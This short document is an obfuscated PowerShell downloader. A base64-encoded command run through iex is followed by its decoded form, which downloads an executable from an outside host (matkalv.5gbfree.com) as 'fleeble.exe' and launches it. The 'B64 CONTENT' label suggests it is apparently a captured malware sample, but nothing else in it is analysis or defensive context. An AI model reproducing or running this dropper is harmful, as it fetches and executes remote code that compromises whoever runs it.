iex([SYStem.TeXt.ENCOding]::uTf8.GEtsTRing([sySTeM.CONveRt]::FrOmBAse64STriNG('CihOZXctT2JqZWN0IHNZc1RlbS5uZXQud0VCQ0xJRU5UKS5Eb1dubE9BRGZpTGUoJ2h0dHA6Ly9tYXRrYWx2LjVnYmZyZWUuY29tL3Zvc2EvZG9jLmV4ZScsJ2ZsZWVibGUuZXhlJyk7U3RhcnQtUHJvY2VzcyAnZmxlZWJsZS5leGUnCgo=')));exit

##### B64 CONTENT #####


(New-Object sYsTem.net.wEBCLIENT).DoWnlOADfiLe('http://matkalv.5gbfree.com/vosa/doc.exe','fleeble.exe');Start-Process 'fleeble.exe'

